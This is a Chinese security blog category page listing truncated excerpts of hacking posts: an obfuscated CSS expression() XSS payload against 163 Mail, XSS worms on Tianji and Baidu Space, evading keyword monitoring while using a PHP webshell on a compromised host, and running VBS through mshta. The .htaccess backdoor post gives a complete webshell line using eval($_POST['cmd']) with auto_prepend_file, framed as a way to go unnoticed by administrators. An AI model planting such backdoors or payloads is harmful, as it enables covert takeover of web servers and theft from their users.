分类 ‘技术文章’ 下的日志

163邮箱expression漏洞

来源http://www.leapar.com/web/Article/ShowArticle.asp?ArticleID=475

<html>
<style>
body {
width:
expression(eval(String.fromCharCode(0x69,0x66,0x28,0x21,0x77,0x69,0x6e,
0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x29,0x7b,0x77,

0x69,0x6e,0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x3d,0x31,0x3b,
0x69,0x66,0x28,0x64,0x6f,

0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x29,0x7b,
阅读全文 »

Tags: , ,

攻破Windows EFS解密

来源:Neeao's Blog

EFS(Encrypting File System,加密文件系统)加密是一种基于NTFS磁盘技术的加密技术。EFS加密基于公钥策略。在使用EFS加密一个文件或文件夹时,系统首先会生成一个由伪随机数组成的FEK(File Encryption Key,文件加密钥匙),然后将利用FEK和数据扩展标准X算法创建加密后的文件,并把它存储到硬盘上,同时删除未加密的原始文件。接下来系统利用你的公钥加密FEK,并把加密后的FEK存储在同一个加密文件中。而在访问被加密的文件时,系统首先利用当前用户的私钥解密FEK,然后利用FEK解密出文件。在首次使用EFS时,如果用户还没有公钥/私钥对(统称为密钥),则会首先生成密钥,然后加密数据。如果你登录到了域环境中,密钥的生成依赖于域控制器,否则它就依赖于本地机器。
阅读全文 »

Tags: ,

天际网ajax worm分析及实现

By:Neeao [B.C.T] 2007-12-27

最近心血来潮想研究下ajax worm的传播,偶然发现了天际网的几处xss漏洞,其中一处为俱乐部处留言的地方没过滤好导致xss攻击。就写个ajax worm来玩玩了。

分析:
由于没有对script标记做很好的限制,使ajax worm的应用起来相对就容易的多了。
字符限制为1000,可以直接写源码进页面了。
刚开始用xmlhttp来获取数据和提交数据,不知道怎么回事,在IE下调试能用,在firefox下调试不起作用了。
后来发现天际网采用了一个叫做jquery的轻量级的javascript框架,于是直接调用框架中的ajax函数。
发现一个好处,采用系统自带框架的ajax函数,可以使ajax worm代码更短。

写了个简单的应用,一共10行,代码如下:
阅读全文 »

Tags: ,

百度空间蠕虫分析ex/*exp/**/ression*/pression

作者:ycosxhack
来源:余弦函数

声明在前:
此蠕虫源码迟早会曝光,也没隐藏的必要,得到消息称百度空间工程师正在修补中,我写完这篇文章是对其感染技术进行分析,估计等我写完文章时这样的漏洞利用方式就会失效(希望他们的效率高些)。
——————————————————————————————————–
今天看到52abc的文章 阅读全文 »

Tags: , ,

绕过web环境关键字监控的尝试

by 唐不狐
http://blog.wang1.cn

问题:win2003+php环境下,server安装了类似“一流信息监控系统”的玩意,对一些设定的关键字进行拦截。于是我在phpshell中执行sql查询及系统命令时,就被提示文件无权限访问了。

解决方案考虑:

1.mysql-front的phphttp代理功能

公司技术工程师给我提供了这个方法。他介绍说mysql-front在3.2版本开始提供一个脚本,支持代理。
使用方法:在程序目录下有个php文件。我们把它上传至肉鸡web目录下。本地配置如下

这样就ok了。
阅读全文 »

通过 Windows 注册表修改 PHP 配置

作者:GaRY
来源:GaRY's Blog

PHP手册,常看常新:)
记录一下,不错不错

在 Windows 下运行 PHP 时,可以用 Windows 注册表以目录为单位来修改配置。配置值存放于注册表项 HKLM\SOFTWARE\PHP\Per Directory Values 下面,子项对应于路径名。例如对于目录 c:\inetpub\wwwroot 的配置值会存放于 HKLM\SOFTWARE\PHP\Per Directory Values\c\inetpub\wwwroot 项下面。其中的设定对于任何位于此目录及其任何子目录的脚本都有效。项中的值的名称是 PHP 配置指令的名字,值的数据是字符串格式的指令值。值中的 PHP 常量不被解析。不过只有可修改范围是 阅读全文 »

Tags: ,

.htaccess后门

作者:GaRY
来源:GaRY's Blog

PHP手册,常看常新:)
PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:
auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path
特殊值 none 禁止了自动前缀。
auto_append_file string
指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path
特殊值 none 禁止了自动后缀。
Note: 如果脚本通过 exit() 终止,则自动后缀不会发生。
于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉.
本地测试了一下,写了个.htaccess文件到我的sphpblog目录中.

#<?php eval($_POST['cmd']);?>
php_value auto_prepend_file ".htaccess"

然后随意访问一下sphpblog中的任意文件.

当然直接包含.haccess文件太明显了,上面一对无关和出错信息会出卖你的后门的.我这里只是PoC,要包含什么就随便各位了.
哦,还有一点,会很方便:
include_path ".;/path/to/php/pear" PHP_INI_ALL
什么意思我就不说了.各位自己琢磨吧,呵呵

Tags:

非常规运行vbs

作者:lcx

  这期专栏依旧是vbs,估计大家会有点烦,那我们来点有意思的吧。vbs有一个对像是“SAPI.SpVoice”,可以用它来讲英语的,这个组件在 xp、2003上默认都可以用的,调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码:●CreateObject ("SAPI.SpVoice").Speak "I LOVE YOU"●,保存成vbs后缀后双击就会听到英语的我爱你了。但随之而来我们讲到另一个问题,不保存成vbs或vbe后缀如何运行vbs代码。

一、用mshta来运行vbs
hta这种类型的文件运行后也是系统权限,其调用宿主就是mshta.exe。我们在cmd下运行这样一行代码:●mshta vbscript:createobject("sapi.spvoice").speak("I 阅读全文 »

Tags: